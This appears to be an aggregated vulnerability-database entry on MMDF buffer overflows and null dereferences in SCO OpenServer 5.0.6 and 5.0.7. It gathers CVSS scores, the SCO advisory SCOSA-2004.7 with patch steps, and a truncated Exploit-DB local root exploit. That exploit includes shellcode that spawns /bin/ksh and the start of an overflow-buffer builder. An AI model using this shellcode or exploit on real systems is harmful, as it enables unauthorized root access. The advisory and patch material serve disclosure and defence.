Published: 2004-12-23 00:00:00
Revised: 2008-09-05 16:38:36

[Original] Multiple unknown vulnerabilities in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to cause a denial of service by triggering a null dereference.

[CNNVD] OpenServer MMDF multiple buffer overflow vulnerabilities (CNNVD-200412-090)

        In addition, MMDF has NULL pointer dereference and core dump issues that can cause the application to crash,

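- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]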

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  XF  openserver-mmdf-name-dos(16739)

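- Vulnerability information

OpenServer MMDF multiple buffer overflow vulnerabilities
Low risk  Boundary condition error
2004-12-23 00:00:00 2005-10-20 00:00:00
        In addition, MMDF has NULL pointer dereference and core dump issues that can cause the application to crash,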

- Advisories and patches

        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         SCO OpenServer Release 5.0.7 Maintenance Pack 3 and later also include this patch:

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries

- Vulnerability information (24293)

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities (EDBID:24293)
sco local
2004-07-20 Verified
0 Ramon Valle
N/A

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];



- Vulnerability information (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.


			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512

1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.

6. References

	Specific references for this advisory:

	SCO security resources:

	SCO security advisories via email

	This security fix closes SCO incidents sr884728 fz528322

7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO

8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."



- Vulnerability information

SCO OpenServer MMDF Null Dereferences DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Unknown

- Vulnerability description

OpenServer contains a flaw that may allow a remote denial of service. The issue is triggered when an unspecified null dereference occurs in the MMDF package, and will result in loss of availability for the service. No further details have been provided.

- Timeline

2004-07-14 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete